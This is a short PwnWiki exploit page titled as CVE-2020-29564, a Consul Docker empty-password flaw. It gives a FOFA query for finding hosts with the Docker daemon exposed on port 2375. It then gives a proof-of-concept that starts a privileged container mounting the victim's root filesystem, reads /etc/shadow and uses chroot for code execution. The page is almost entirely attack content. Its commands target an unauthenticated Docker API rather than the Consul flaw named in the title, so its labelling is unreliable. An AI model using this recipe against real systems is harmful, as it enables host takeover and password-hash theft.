CVE-2020-29564 Consul Docker images 空密碼登錄漏洞

From PwnWiki

Revision as of 15:01, 27 April 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> port="2375" && protocol=="docker" </pre> ==POC== <pre> docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/s...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

port="2375" && protocol=="docker"

POC

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-29564_Consul_Docker_images_空密碼登錄漏洞&oldid=1903"